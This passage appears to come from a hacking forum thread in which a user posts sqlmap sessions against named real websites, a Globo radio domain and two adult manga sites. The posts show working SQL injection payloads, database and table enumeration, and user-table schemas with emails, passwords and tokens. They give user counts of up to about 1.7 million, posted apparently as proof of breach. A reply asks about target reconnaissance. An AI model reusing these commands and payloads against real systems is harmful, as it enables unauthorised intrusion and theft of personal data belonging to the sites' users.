[06:48:36] [INFO] resumed: tb_pub_profissional
[06:48:36] [INFO] resumed: tb_pub_profissional_area
[06:48:36] [INFO] resumed: tb_pub_profissional_funcao
[06:48:36] [INFO] resumed: tb_pub_profissional_programa
[06:48:36] [INFO] resumed: tb_pub_programa
[06:48:36] [INFO] resumed: tb_pub_promocao
[06:48:36] [INFO] resumed: tb_pub_promocao_area
[06:48:36] [INFO] resumed: tb_pub_promocao_campo_texto
[06:48:36] [INFO] resumed: tb_pub_promocao_resultado
[06:48:36] [INFO] resumed: tb_pub_promocao_usuario
[06:48:36] [INFO] resumed: tb_pub_promocao_usuario_campo_resposta
[06:48:36] [INFO] resumed: tb_pub_radio
[06:48:36] [INFO] resumed: tb_pub_radio_praca
[06:48:36] [INFO] resumed: tb_pub_radio_servico
[06:48:36] [INFO] resumed: tb_pub_regiao
[06:48:36] [INFO] resumed: tb_pub_rel_podcast
[06:48:36] [INFO] resumed: tb_pub_selo
[06:48:36] [INFO] resumed: tb_pub_selo_flash
[06:48:36] [INFO] resumed: tb_pub_selo_foto
[06:48:36] [INFO] resumed: tb_pub_serie
[06:48:36] [INFO] resumed: tb_pub_serie_materia
[06:48:36] [INFO] resumed: tb_pub_servico
[06:48:36] [INFO] resumed: tb_pub_servico_usuario
[06:48:36] [INFO] resumed: tb_pub_tag
[06:48:36] [INFO] resumed: tb_pub_tag_area
[06:48:36] [INFO] resumed: tb_pub_tipo_destaque
[06:48:36] [INFO] resumed: tb_pub_tipo_foto
[06:48:36] [INFO] resumed: tb_pub_tp_destaque_materia
[06:48:36] [INFO] resumed: tb_pub_usuario_sessao
[06:48:36] [INFO] resumed: tb_pub_video
[06:48:36] [INFO] resumed: tb_radioglobo_cadastro_rg60
Database: globoradio
[337 tables]
+--------------------------------------------+
| cbn_areas                                  |
| cbn_destaques                              |
| cbn_email                                  |
| cbn_email_bkp                              |
| cbn_grupos                                 |
| cbn_imagens                                |
| cbn_links                                  |
| cbn_linksmanchete                          |
| cbn_manchete                               |
| cbn_noticias                               |
| cbn_outrasn_links                          |
| cbn_outrasnoticias                         |
| cbn_outrosc_links                          |
| cbn_outroscomen                            |
| cbn_tipo_links                             |
| cbn_usuario                                |
| es_area                                    |
| es_area_curso                              |
| es_area_estado                             |
| es_area_localdata                          |
| es_curso                                   |
| es_estado                                  |
| es_inscricao                               |
| es_instituicao                             |
| es_local                                   |
| es_localdata                               |
| mkt_nota                                   |
| mkt_pagina                                 |
| pela_album                                 |
| pela_bairro                                |
| pela_campeonato                            |
| pela_campo_futebol                         |
| pela_cidade                                |
| pela_comentario_campo                      |
| pela_comentario_feed                       |
| pela_configuracoes                         |
| pela_convite_evento                        |
| pela_convite_time                          |
| pela_convite_usuario                       |
| pela_estado                                |
| pela_evento                                |
| pela_feeds_time                            |
| pela_foto                                  |
| pela_foto_campo                            |
| pela_horarios_campo                        |
| pela_jogo                                  |
| pela_mensagem                              |
| pela_time                                  |
| pela_time_campeonato                       |
| pela_time_jogo                             |
| pela_trofeu                                |
| pela_trofeu_atribuido                      |
| pela_usuario                               |
| pela_usuario_campo                         |
| pela_usuario_time                          |
| pela_usuario_time_jogo                     |
| pela_video                                 |
| pgr_tb_pergunta                            |
| pgr_tb_pergunta_resposta                   |
| pgr_tb_voto                                |
| pgr_tb_voto_resposta                       |
| tb_adm_grupo                               |
| tb_adm_log                                 |
| tb_adm_modulo                              |
| tb_adm_modulo_grupo                        |
| tb_adm_operacao                            |
| tb_adm_pagina                              |
| tb_adm_pagina_portlet                      |
| tb_adm_parametro                           |
| tb_adm_portlet                             |
| tb_adm_portlet_pagina                      |
| tb_adm_usuario                             |
| tb_adm_usuario_grupo                       |
| tb_cbn_categoria                           |
| tb_cbn_credito_foto                        |
| tb_cbn_foto_galeria                        |
| tb_cbn_galeria                             |
| tb_cbn_galeria_categoria                   |
| tb_cbn_podcast_download                    |
| tb_cbn_podcast_download_spot_dia           |
| tb_cbn_spot_categoria_cbn                  |
| tb_cbn_video                               |
| tb_cbn_video_categoria                     |
| tb_cbn_video_galeria                       |
| tb_concursos                               |
| tb_concursos_comentarios                   |
| tb_concursos_grupos                        |
| tb_concursos_participacao                  |
| tb_concursos_pessoal                       |
| tb_concursos_pessoal_complemento           |
| tb_crm_endereco                            |
| tb_crm_endereco_radio                      |
| tb_crm_usuario                             |
| tb_crm_usuario_celular_confirmado          |
| tb_glb_mlg_transacao                       |
| tb_pub_area                                |
| tb_pub_area_link                           |
| tb_pub_area_metadado                       |
| tb_pub_area_time_rg                        |
| tb_pub_audio                               |
| tb_pub_bannerclique                        |
| tb_pub_campanha                            |
| tb_pub_campanha_podcast                    |
| tb_pub_campanha_spot                       |
| tb_pub_cbn_categoria_metadado              |
| tb_pub_cbn_grade_programacao               |
| tb_pub_cbn_par_parceiro                    |
| tb_pub_cbn_par_parceiro_blog               |
| tb_pub_cbn_par_parceiro_categoria          |
| tb_pub_cbn_par_parceiro_twitter            |
| tb_pub_cliente                             |
| tb_pub_colaboracao                         |
| tb_pub_colaboracao_audio                   |
| tb_pub_colaboracao_foto_ext                |
| tb_pub_colaboracao_video                   |
| tb_pub_com_spot                            |
| tb_pub_com_spot_area                       |
| tb_pub_comentario                          |
| tb_pub_comentario_denuncia                 |
| tb_pub_destaques_distribuicao              |
| tb_pub_email_black_list                    |
| tb_pub_estudio_aba                         |
| tb_pub_evento                              |
| tb_pub_flash                               |
| tb_pub_foto                                |
| tb_pub_foto_externa                        |
| tb_pub_funcao                              |
| tb_pub_fut_campeonato                      |
| tb_pub_fut_campeonato_fase                 |
| tb_pub_fut_campeonato_rg                   |
| tb_pub_fut_confronto                       |
| tb_pub_fut_confronto_rg                    |
| tb_pub_fut_confronto_rg_comentarista       |
| tb_pub_fut_confronto_rg_locutor            |
| tb_pub_fut_confronto_rg_materia            |
| tb_pub_fut_confronto_rg_praca              |
| tb_pub_fut_fase                            |
| tb_pub_fut_gol_confronto_rg                |
| tb_pub_fut_grupo                           |
| tb_pub_fut_grupo_time                      |
| tb_pub_fut_tabela_jogo                     |
| tb_pub_fut_time                            |
| tb_pub_fut_time_confronto                  |
| tb_pub_fut_time_confronto_rg               |
| tb_pub_fut_time_rg                         |
| tb_pub_futebol_praca                       |
| tb_pub_futebol_praca_rg                    |
| tb_pub_gen_agenda_eventos                  |
| tb_pub_gen_album                           |
| tb_pub_gen_album_figurinha                 |
| tb_pub_gen_album_figurinha_pagina          |
| tb_pub_gen_album_figurinha_usuario         |
| tb_pub_gen_album_midia_grupo               |
| tb_pub_gen_aovivo                          |
| tb_pub_gen_aovivo_playlist                 |
| tb_pub_gen_aovivo_xref                     |
| tb_pub_gen_artista                         |
| tb_pub_gen_artista_galeria_foto            |
| tb_pub_gen_artista_midia_grupo             |
| tb_pub_gen_artista_musica                  |
| tb_pub_gen_artista_playlist                |
| tb_pub_gen_artista_radio                   |
| tb_pub_gen_artista_radio_galeria_foto      |
| tb_pub_gen_artista_radio_link              |
| tb_pub_gen_artista_radio_materia           |
| tb_pub_gen_audio_colaboracao               |
| tb_pub_gen_blog                            |
| tb_pub_gen_blog_area                       |
| tb_pub_gen_cadunsocial                     |
| tb_pub_gen_categoria_midia                 |
| tb_pub_gen_categoria_midia_grupo           |
| tb_pub_gen_categoria_musica                |
| tb_pub_gen_colaboracao                     |
| tb_pub_gen_colaboracao_audio_colaboracao   |
| tb_pub_gen_colaboracao_foto_colaboracao    |
| tb_pub_gen_colaboracao_video_colaboracao   |
| tb_pub_gen_comentario                      |
| tb_pub_gen_comentario_denuncia             |
| tb_pub_gen_compositor                      |
| tb_pub_gen_compositor_midia_grupo          |
| tb_pub_gen_credito                         |
| tb_pub_gen_credito_foto                    |
| tb_pub_gen_enquete                         |
| tb_pub_gen_enquete_campo                   |
| tb_pub_gen_enquete_resultado               |
| tb_pub_gen_equipe                          |
| tb_pub_gen_equipe_profissional             |
| tb_pub_gen_especial_publicitario           |
| tb_pub_gen_especial_publicitario_link      |
| tb_pub_gen_estudio                         |
| tb_pub_gen_filtro_acao                     |
| tb_pub_gen_filtro_palavra                  |
| tb_pub_gen_foto                            |
| tb_pub_gen_foto_colaboracao                |
| tb_pub_gen_foto_tamanho                    |
| tb_pub_gen_galeria_album_figurinha         |
| tb_pub_gen_galeria_foto                    |
| tb_pub_gen_galeria_foto_area               |
| tb_pub_gen_galeria_grupo_album_figurinha   |
| tb_pub_gen_galeria_grupo_foto              |
| tb_pub_gen_galeria_imagem                  |
| tb_pub_gen_galeria_imagem_area             |
| tb_pub_gen_galeria_imagem_imagem           |
| tb_pub_gen_galeria_midia                   |
| tb_pub_gen_galeria_midia_area              |
| tb_pub_gen_galeria_midia_grupo_midia       |
| tb_pub_gen_grade_programacao               |
| tb_pub_gen_gravadora                       |
| tb_pub_gen_grupo_foto                      |
| tb_pub_gen_grupo_foto_figurinha            |
| tb_pub_gen_grupo_imagem                    |
| tb_pub_gen_grupo_midia                     |
| tb_pub_gen_grupo_midia_area                |
| tb_pub_gen_grupo_midia_letra               |
| tb_pub_gen_grupo_midia_opiniao             |
| tb_pub_gen_grupo_midia_opiniao_dados       |
| tb_pub_gen_grupo_midia_opiniao_origem      |
| tb_pub_gen_grupo_profissional              |
| tb_pub_gen_grupo_profissional_profissional |
| tb_pub_gen_grupo_tamanho_foto              |
| tb_pub_gen_grupo_tamanho_foto_tamanho      |
| tb_pub_gen_html                            |
| tb_pub_gen_imagem                          |
| tb_pub_gen_instancia                       |
| tb_pub_gen_instancia_portlet               |
| tb_pub_gen_link_artista                    |
| tb_pub_gen_link_profissional               |
| tb_pub_gen_log_grupo_midia                 |
| tb_pub_gen_log_midia                       |
| tb_pub_gen_mais_acessados                  |
| tb_pub_gen_materia                         |
| tb_pub_gen_materia_area                    |
| tb_pub_gen_materia_grupo_midia             |
| tb_pub_gen_materia_playlist                |
| tb_pub_gen_materia_relacionada             |
| tb_pub_gen_materia_time_rg                 |
| tb_pub_gen_midia                           |
| tb_pub_gen_midia_foto                      |
| tb_pub_gen_midia_gravadora                 |
| tb_pub_gen_midia_grupo                     |
| tb_pub_gen_midia_meta                      |
| tb_pub_gen_musica                          |
| tb_pub_gen_musica_album                    |
| tb_pub_gen_musica_radio                    |
| tb_pub_gen_path_fisico                     |
| tb_pub_gen_player                          |
| tb_pub_gen_player_tipo                     |
| tb_pub_gen_playlist                        |
| tb_pub_gen_playlist_aovivo                 |
| tb_pub_gen_playlist_area                   |
| tb_pub_gen_playlist_area2                  |
| tb_pub_gen_playlist_categoria_midia        |
| tb_pub_gen_playlist_favorita               |
| tb_pub_gen_playlist_grupo_midia            |
| tb_pub_gen_playlist_ouvida                 |
| tb_pub_gen_playlist_xref                   |
| tb_pub_gen_profissional                    |
| tb_pub_gen_profissional_area               |
| tb_pub_gen_profissional_funcao             |
| tb_pub_gen_profissional_materia            |
| tb_pub_gen_profissional_programa           |
| tb_pub_gen_programa_profissional           |
| tb_pub_gen_pulsar_opiniao                  |
| tb_pub_gen_quadro                          |
| tb_pub_gen_quadro_profissional             |
| tb_pub_gen_quiz                            |
| tb_pub_gen_quiz_controle_usuario           |
| tb_pub_gen_quiz_pergunta                   |
| tb_pub_gen_quiz_pergunta_opcao             |
| tb_pub_gen_quiz_resposta_usuario           |
| tb_pub_gen_skin                            |
| tb_pub_gen_tamanho_imagem                  |
| tb_pub_gen_ticker                          |
| tb_pub_gen_tipo_midia                      |
| tb_pub_gen_video_colaboracao               |
| tb_pub_grade_programacao                   |
| tb_pub_instancia                           |
| tb_pub_intervalo                           |
| tb_pub_materia                             |
| tb_pub_materia_area                        |
| tb_pub_materia_area_destaque               |
| tb_pub_materia_foto                        |
| tb_pub_materia_link                        |
| tb_pub_materia_relacionada                 |
| tb_pub_materia_tag                         |
| tb_pub_metadado                            |
| tb_pub_modulo                              |
| tb_pub_newsletter                          |
| tb_pub_newsletter_materia                  |
| tb_pub_newsletter_usuario_erro             |
| tb_pub_par_parceiro                        |
| tb_pub_par_parceiro_area                   |
| tb_pub_par_parceiro_area_galeria           |
| tb_pub_par_parceiro_area_playlist          |
| tb_pub_par_parceiro_profissional           |
| tb_pub_par_parceiro_programa               |
| tb_pub_par_podcast                         |
| tb_pub_par_podcast_area                    |
| tb_pub_pchave                              |
| tb_pub_pchave_classificacao                |
| tb_pub_pchave_identidade                   |
| tb_pub_podcast                             |
| tb_pub_podcast_area                        |
| tb_pub_premio                              |
| tb_pub_premio_area                         |
| tb_pub_premio_materia                      |
| tb_pub_profissional                        |
| tb_pub_profissional_area                   |
| tb_pub_profissional_funcao                 |
| tb_pub_profissional_programa               |
| tb_pub_programa                            |
| tb_pub_promocao                            |
| tb_pub_promocao_area                       |
| tb_pub_promocao_campo_texto                |
| tb_pub_promocao_resultado                  |
| tb_pub_promocao_usuario                    |
| tb_pub_promocao_usuario_campo_resposta     |
| tb_pub_radio                               |
| tb_pub_radio_praca                         |
| tb_pub_radio_servico                       |
| tb_pub_regiao                              |
| tb_pub_rel_podcast                         |
| tb_pub_selo                                |
| tb_pub_selo_flash                          |
| tb_pub_selo_foto                           |
| tb_pub_serie                               |
| tb_pub_serie_materia                       |
| tb_pub_servico                             |
| tb_pub_servico_usuario                     |
| tb_pub_tag                                 |
| tb_pub_tag_area                            |
| tb_pub_tipo_destaque                       |
| tb_pub_tipo_foto                           |
| tb_pub_tp_destaque_materia                 |
| tb_pub_usuario_sessao                      |
| tb_pub_video                               |
| tb_radioglobo_cadastro_rg60                |
+--------------------------------------------+

[06:48:36] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/bhfm.globo.com'

[*] ending @ 06:48:36 /2025-09-11/

Код:

(myenv) root@E02S29:~# sqlmap -u "https://bhfm.globo.com/evento.php?area=BHEVI&eventoId=3464" --level=3 --risk=2 --batch --random-agent --tamper=space2comment -D globoradio -T tb_crm_usuario --count
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.9#pip}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:51:57 /2025-09-11/

[06:51:57] [INFO] loading tamper module 'space2comment'
[06:51:57] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
[06:51:57] [INFO] resuming back-end DBMS 'mysql'
[06:51:57] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=s0f4v34cs4d...07v1vq3m91'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: eventoId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: area=BHEVI&eventoId=3464 AND 6233=6233

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: area=BHEVI&eventoId=3464 AND (SELECT 2984 FROM (SELECT(SLEEP(5)))MVPu)
---
[06:52:00] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[06:52:00] [INFO] the back-end DBMS is MySQL
web application technology: PHP
back-end DBMS: MySQL >= 5.0.12 (Percona fork)
[06:52:02] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[06:52:02] [INFO] retrieved: 834180
Database: globoradio
+----------------+---------+
| Table          | Entries |
+----------------+---------+
| tb_crm_usuario | 834180  |
+----------------+---------+

[06:52:44] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/bhfm.globo.com'

[*] ending @ 06:52:44 /2025-09-11/

looonely_creature · 11.09.2025

do you use dork for these types of targets ? or do you recon manually ?
just a general question

MrDark · 12.09.2025

looonely_creature сказал(а):

do you use dork for these types of targets ? or do you recon manually ?
just a general question

None, I am using my own created tools that pre-finds injectable endpoints and does some small payload encoded tests to pre-confirm if the target is actually vuln or not.

MrDark · 13.09.2025

Database: heradb
+-------+---------+
| Table | Entries |
+-------+---------+
| users | 1677367 |
+-------+---------+

Код:

(myenv) root@E02S29:~# sqlmap -u "https://hentaiera.com/search/?key=key" --level=3 --risk=2 --dbs --batch
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.9#pip}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 01:23:57 /2025-09-13/

[01:23:57] [INFO] resuming back-end DBMS 'mysql'
[01:23:57] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=i5m3c9lk9n4...i7g4s9ve2o'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: key (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: key=test' AND 5830=(SELECT (CASE WHEN (5830=5830) THEN 5830 ELSE (SELECT 5823 UNION SELECT 5168) END))-- -

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: key=test' AND (SELECT 9211 FROM(SELECT COUNT(*),CONCAT(0x71717a7171,(SELECT (ELT(9211=9211,1))),0x71626a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'qwNy'='qwNy

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: key=test' AND (SELECT 1578 FROM (SELECT(SLEEP(5)))doFV) AND 'HPDy'='HPDy
---
[01:23:59] [INFO] the back-end DBMS is MySQL
web application technology: PHP
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[01:23:59] [INFO] fetching database names
[01:23:59] [INFO] resumed: 'information_schema'
[01:23:59] [INFO] resumed: 'mysql'
[01:23:59] [INFO] resumed: 'performance_schema'
[01:23:59] [INFO] resumed: 'heradb'
[01:23:59] [INFO] resumed: 'dev'
available databases [5]:
[*] dev
[*] heradb
[*] information_schema
[*] mysql
[*] performance_schema

[01:23:59] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/hentaiera.com'

[*] ending @ 01:23:59 /2025-09-13/

(myenv) root@E02S29:~# sqlmap -u "https://hentaiera.com/search/?key=key" --level=3 --risk=2 --batch -D heradb --tables
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.9.9#pip}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 01:24:23 /2025-09-13/

[01:24:23] [INFO] resuming back-end DBMS 'mysql'
[01:24:23] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=7q2d18iv5ts...612c8e6d8h'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: key (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: key=test' AND 5830=(SELECT (CASE WHEN (5830=5830) THEN 5830 ELSE (SELECT 5823 UNION SELECT 5168) END))-- -

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: key=test' AND (SELECT 9211 FROM(SELECT COUNT(*),CONCAT(0x71717a7171,(SELECT (ELT(9211=9211,1))),0x71626a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'qwNy'='qwNy

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: key=test' AND (SELECT 1578 FROM (SELECT(SLEEP(5)))doFV) AND 'HPDy'='HPDy
---
[01:24:25] [INFO] the back-end DBMS is MySQL
web application technology: PHP
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[01:24:25] [INFO] fetching tables for database: 'heradb'
Database: heradb
[32 tables]
+----------------------+
| groups               |
| artists              |
| categories           |
| characters           |
| coins_cap            |
| coins_history        |
| comments             |
| content_filter       |
| data_tags            |
| downloads            |
| fap_list             |
| favorites            |
| galleries            |
| galleries_info       |
| invoices             |
| languages            |
| notifications        |
| notifications_custom |
| pairing              |
| parodies             |
| pass_reset           |
| search_filter        |
| shop_items           |
| shop_list            |
| subs_status          |
| tags                 |
| users                |
| users_artists        |
| users_blacklist      |
| users_details        |
| users_premium        |
| vote_list            |
+----------------------+

[01:24:25] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/hentaiera.com'

[*] ending @ 01:24:25 /2025-09-13/

Database: heradb
Table: users
[12 columns]
+-----------------+---------------------+
| Column          | Type                |
+-----------------+---------------------+
| status          | tinyint(3) unsigned |
| coins           | int(10) unsigned    |
| email           | varchar(255)        |
| id              | mediumint(9)        |
| last_login_date | datetime            |
| login_ip        | varchar(255)        |
| password        | varchar(255)        |
| registered_date | datetime            |
| registered_ip   | varchar(255)        |
| rmb_me_expiry   | datetime            |
| rmb_me_token    | varchar(64)         |
| username        | varchar(255)        |
+-----------------+---------------------+

MrDark · 13.09.2025

Database: manga18_clu_3069
+-------+---------+
| Table | Entries |
+-------+---------+
| users | 44842 |
+-------+---------+

Код:

(myenv) root@E02S29:~# sqlmap -u "https://manga18.club/list-manga/109?search=*" --level=3 --risk=2 --batch --dbs
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.9#pip}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 01:49:26 /2025-09-13/

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[01:49:28] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[01:49:28] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('ci_session=kid2mlegk6f...piecar2l16'). Do you want to use those [Y/n] Y
[01:49:29] [INFO] checking if the target is protected by some kind of WAF/IPS
[01:49:30] [WARNING] reflective value(s) found and filtering out
[01:49:30] [INFO] testing if the target URL content is stable
[01:49:31] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[01:49:31] [INFO] testing if URI parameter '#1*' is dynamic
[01:49:33] [INFO] URI parameter '#1*' appears to be dynamic
[01:49:33] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[01:49:34] [INFO] heuristic (XSS) test shows that URI parameter '#1*' might be vulnerable to cross-site scripting (XSS) attacks
[01:49:34] [INFO] testing for SQL injection on URI parameter '#1*'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) and risk (2) values? [Y/n] Y
[01:49:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:49:42] [INFO] URI parameter '#1*' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[01:49:42] [INFO] testing 'Generic inline queries'
[01:49:43] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[01:49:43] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[01:49:43] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[01:49:43] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[01:49:43] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[01:49:43] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[01:49:43] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[01:49:43] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[01:49:43] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[01:49:44] [INFO] URI parameter '#1*' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[01:49:44] [INFO] testing 'MySQL inline queries'
[01:49:44] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[01:49:44] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[01:49:44] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[01:49:44] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[01:49:44] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[01:49:44] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[01:49:44] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[01:50:25] [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[01:50:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[01:50:25] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[01:50:33] [INFO] target URL appears to be UNION injectable with 1 columns
[01:50:34] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
[01:50:34] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[01:50:36] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[01:50:38] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[01:50:40] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[01:50:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[01:50:52] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[01:50:54] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[01:50:56] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[01:50:58] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[01:51:00] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[01:51:02] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[01:51:04] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[01:51:07] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[01:51:08] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 380 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: https://manga18.club/list-manga/109?search=" AND 2970=2970 AND "bGYj" LIKE "bGYj

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: https://manga18.club/list-manga/109?search=" AND (SELECT 3774 FROM(SELECT COUNT(*),CONCAT(0x71767a7871,(SELECT (ELT(3774=3774,1))),0x717a717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND "YUti" LIKE "YUti

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: https://manga18.club/list-manga/109?search=" AND (SELECT 2565 FROM (SELECT(SLEEP(5)))idwR) AND "KvEl" LIKE "KvEl
---
[01:51:10] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[01:51:11] [INFO] fetching database names
[01:51:11] [INFO] retrieved: 'information_schema'
[01:51:11] [INFO] retrieved: 'performance_schema'
[01:51:11] [INFO] retrieved: 'mysql'
[01:51:11] [INFO] retrieved: 'manga18_clu_3069'
available databases [4]:
[*] information_schema
[*] manga18_clu_3069
[*] mysql
[*] performance_schema

[01:51:11] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 348 times
[01:51:11] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/manga18.club'

[*] ending @ 01:51:11 /2025-09-13/


Database: manga18_clu_3069
[41 tables]
+-----------------------+
| options               |
| page                  |
| status                |
| view                  |
| activations           |
| ad                    |
| ad_placement          |
| author                |
| author_manga          |
| bookmarks             |
| category              |
| category_manga        |
| chapter               |
| ci_sessions           |
| comictype             |
| comments              |
| failed_jobs           |
| fonts                 |
| general_settings      |
| item_ratings          |
| jobs                  |
| language_translations |
| languages             |
| manga                 |
| manga_tag             |
| menu_nodes            |
| menus                 |
| migrations            |
| notif_settings        |
| notifications         |
| page_cms              |
| persistences          |
| placement             |
| posts                 |
| reminders             |
| role_users            |
| roles                 |
| settings              |
| tag                   |
